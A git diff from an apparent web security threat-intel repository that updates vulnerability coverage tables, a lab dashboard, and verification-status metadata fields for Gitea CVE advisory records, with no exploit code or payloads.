案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/servers/traefik/INDEX.md b/07-framework-security/servers/traefik/INDEX.md index 260fa171..b7b4d30c 100644 --- a/07-framework-security/servers/traefik/INDEX.md +++ b/07-framework-security/servers/traefik/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/08-threat-intel/generated/coverage-matrix.md b/08-threat-intel/generated/coverage-matrix.md index a2812f91..94f104b2 100644 --- a/08-threat-intel/generated/coverage-matrix.md +++ b/08-threat-intel/generated/coverage-matrix.md @@ -1,66 +1,66 @@ # 覆盖矩阵 -| 系统 | 分类 | 覆盖策略 | 历史全量 | 近两年全量 | 全量 registry | 重点案例 Markdown | secure-code 关联 | 自动同步状态 | triage | 最近更新 | -|------|------|----------|----------|------------|--------------|--------------------|------------------|--------------|--------|----------| -| Adminer | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Adobe Commerce | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `4` | `scaffolded` | `0` | `` | -| Angular | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Apache HTTP Server | `servers` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Apache Tomcat | `servers` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| ASP.NET Core | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Astro | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Caddy | `servers` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Directus | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Discourse | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Django | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Drupal | `cms` | `history-full` | `yes` | `yes` | `0` | `0` | `4` | `scaffolded` | `0` | `` | -| Echo | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| esbuild | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Express | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Fastify | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Flask | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Ghost | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Gin | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Gitea | `platforms` | `rolling-24m` | `-` | `yes` | `37` | `37` | `3` | `seeded` | `0` | `2026-03-03T04:57:57.697708Z` | -| GitLab CE | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Grafana | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Hapi | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| HAProxy | `servers` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Jenkins | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Joomla | `cms` | `history-full` | `yes` | `yes` | `0` | `0` | `4` | `scaffolded` | `0` | `` | -| Kibana | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Koa | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Laravel | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Magento Open Source | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Mattermost | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| MediaWiki | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Medusa | `ecommerce` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Moodle | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| NestJS | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Next.js | `frameworks` | `history-full` | `yes` | `yes` | `26` | `26` | `3` | `seeded` | `0` | `2026-03-13T22:14:13.665535Z` | -| Nginx | `servers` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Node.js | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Nuxt | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| OpenCart | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| OpenMage / Mage-OS | `ecommerce` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| phpMyAdmin | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| PrestaShop | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Ruby on Rails | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| React | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Redmine | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Saleor | `ecommerce` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Shopware | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Spring Boot | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Spring Framework | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Spring Security | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Strapi | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| SvelteKit | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Symfony | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| Traefik | `servers` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Undici | `frameworks` | `rolling-24m` | `-` | `yes` | `14` | `14` | `2` | `seeded` | `0` | `2026-03-14T09:19:54.772219Z` | -| Vite | `frameworks` | `history-full` | `yes` | `yes` | `12` | `12` | `3` | `seeded` | `0` | `2026-02-04T04:37:24.129476Z` | -| Vue | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| webpack | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| Werkzeug | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `0` | `` | -| WooCommerce | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `0` | `` | -| WordPress | `cms` | `history-full` | `yes` | `yes` | `0` | `0` | `4` | `scaffolded` | `0` | `` | +| 系统 | 分类 | 覆盖策略 | 历史全量 | 近两年全量 | 全量 registry | 重点案例 Markdown | secure-code 关联 | 自动同步状态 | 本地实证状态 | 浏览器证据 | run bundle | triage | 最近更新 | +|------|------|----------|----------|------------|--------------|--------------------|------------------|--------------|--------------|------------|-----------|--------|----------| +| Adminer | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Adobe Commerce | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `4` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Angular | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Apache HTTP Server | `servers` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Apache Tomcat | `servers` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| ASP.NET Core | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Astro | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Caddy | `servers` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Directus | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Discourse | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Django | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Drupal | `cms` | `history-full` | `yes` | `yes` | `0` | `0` | `4` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Echo | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| esbuild | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Express | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Fastify | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Flask | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Ghost | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Gin | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Gitea | `platforms` | `rolling-24m` | `-` | `yes` | `37` | `37` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-03T04:57:57.697708Z` | +| GitLab CE | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Grafana | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Hapi | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| HAProxy | `servers` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Jenkins | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Joomla | `cms` | `history-full` | `yes` | `yes` | `0` | `0` | `4` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Kibana | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Koa | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Laravel | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Magento Open Source | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Mattermost | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| MediaWiki | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Medusa | `ecommerce` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Moodle | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| NestJS | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Next.js | `frameworks` | `history-full` | `yes` | `yes` | `26` | `26` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-13T22:14:13.665535Z` | +| Nginx | `servers` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Node.js | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Nuxt | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| OpenCart | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| OpenMage / Mage-OS | `ecommerce` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| phpMyAdmin | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| PrestaShop | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Ruby on Rails | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| React | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Redmine | `platforms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Saleor | `ecommerce` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Shopware | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Spring Boot | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Spring Framework | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Spring Security | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Strapi | `cms` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| SvelteKit | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Symfony | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Traefik | `servers` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Undici | `frameworks` | `rolling-24m` | `-` | `yes` | `14` | `14` | `2` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-03-14T09:19:54.772219Z` | +| Vite | `frameworks` | `history-full` | `yes` | `yes` | `12` | `12` | `3` | `seeded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `2026-02-04T04:37:24.129476Z` | +| Vue | `frameworks` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| webpack | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| Werkzeug | `frameworks` | `rolling-24m` | `-` | `yes` | `0` | `0` | `2` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| WooCommerce | `ecommerce` | `history-full` | `yes` | `yes` | `0` | `0` | `3` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | +| WordPress | `cms` | `history-full` | `yes` | `yes` | `0` | `0` | `4` | `scaffolded` | `real:0/synthetic:0/blocked:0` | `0` | `0` | `0` | `` | diff --git a/08-threat-intel/generated/dashboard/index.html b/08-threat-intel/generated/dashboard/index.html new file mode 100644 index 00000000..146b0543 --- /dev/null +++ b/08-threat-intel/generated/dashboard/index.html @@ -0,0 +1,44 @@ + + + + + websafe dashboard + + + +

websafe Local Lab Dashboard

+

LAB ONLY | AUTHORIZED TARGETS ONLY | 本地静态看板

+
+

Recent Runs

+ + + +
RunAdvisoryStatusModeFinishedReport
+ + + diff --git a/08-threat-intel/generated/dashboard/runs.json b/08-threat-intel/generated/dashboard/runs.json new file mode 100644 index 00000000..fe51488c --- /dev/null +++ b/08-threat-intel/generated/dashboard/runs.json @@ -0,0 +1 @@ +[] diff --git a/08-threat-intel/generated/dashboard/summary.json b/08-threat-intel/generated/dashboard/summary.json new file mode 100644 index 00000000..d605fda0 --- /dev/null +++ b/08-threat-intel/generated/dashboard/summary.json @@ -0,0 +1,5 @@ +{ + "run_count": 0, + "statuses": {}, + "recent_runs": [] +} diff --git a/08-threat-intel/generated/latest-ingest.md b/08-threat-intel/generated/latest-ingest.md index 9642b3dd..7edfe056 100644 --- a/08-threat-intel/generated/latest-ingest.md +++ b/08-threat-intel/generated/latest-ingest.md @@ -1,9 +1,10 @@ # 最新同步摘要 -- 渲染时间: `2026-03-17T04:37:52+00:00` +- 渲染时间: `2026-03-17T06:28:49+00:00` - 系统数量: `62` - Advisory 数量: `89` - 重点 Markdown 数量: `89` +- Run Bundle 数量: `0` - 新增记录: `0` - 更新记录: `0` - Triage 数量: `0` diff --git a/08-threat-intel/generated/run-summary.json b/08-threat-intel/generated/run-summary.json index 4b74ac1e..f38de44a 100644 --- a/08-threat-intel/generated/run-summary.json +++ b/08-threat-intel/generated/run-summary.json @@ -1,5 +1,5 @@ { - "generated_at": "2026-03-17T04:37:52+00:00", + "generated_at": "2026-03-17T06:28:49+00:00", "system_count": 62, "advisory_count": 89, "markdown_count": 89, @@ -7,6 +7,7 @@ "updated_count": 0, "systems_touched": [], "triage_count": 0, + "run_bundle_count": 0, "failures": [ "wordpress::NVD WordPress::SSLError", "wordpress::WPScan Vulnerability Database::SSLError", diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json b/08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json index a2d670b0..dc7e4744 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2018-15192.json @@ -55,6 +55,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json b/08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json index c9f9adf5..c02aa5b1 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2018-18926.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json b/08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json index 8a305ba7..3899adbf 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2019-1010261.json @@ -48,6 +48,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "xss-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json b/08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json index fc543bfa..07493b82 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2020-13246.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json b/08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json index 57dc8c5c..3fd33212 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2021-28378.json @@ -52,6 +52,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "xss-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2021-29134.json b/08-threat-intel/registry/advisories/gitea--CVE-2021-29134.json index b1e1234e..cab8828d 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2021-29134.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2021-29134.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2021-3382.json b/08-threat-intel/registry/advisories/gitea--CVE-2021-3382.json index b667b815..40c243fa 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2021-3382.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2021-3382.json @@ -48,6 +48,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2021-45327.json b/08-threat-intel/registry/advisories/gitea--CVE-2021-45327.json index 65799913..5377f44f 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2021-45327.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2021-45327.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2021-45330.json b/08-threat-intel/registry/advisories/gitea--CVE-2021-45330.json index 7a01626b..ba8453c8 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2021-45330.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2021-45330.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2021-45331.json b/08-threat-intel/registry/advisories/gitea--CVE-2021-45331.json index 6f84ec94..ba191f89 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2021-45331.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2021-45331.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Gitea" diff --git a/08-threat-intel/registry/advisories/gitea--CVE-2022-0905.json b/08-threat-intel/registry/advisories/gitea--CVE-2022-0905.json index 966a5660..ee5f35cd 100644 --- a/08-threat-intel/registry/advisories/gitea--CVE-2022-0905.json +++ b/08-threat-intel/registry/advisories/gitea--CVE-2022-0905.json @@ -50,6 +50,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": 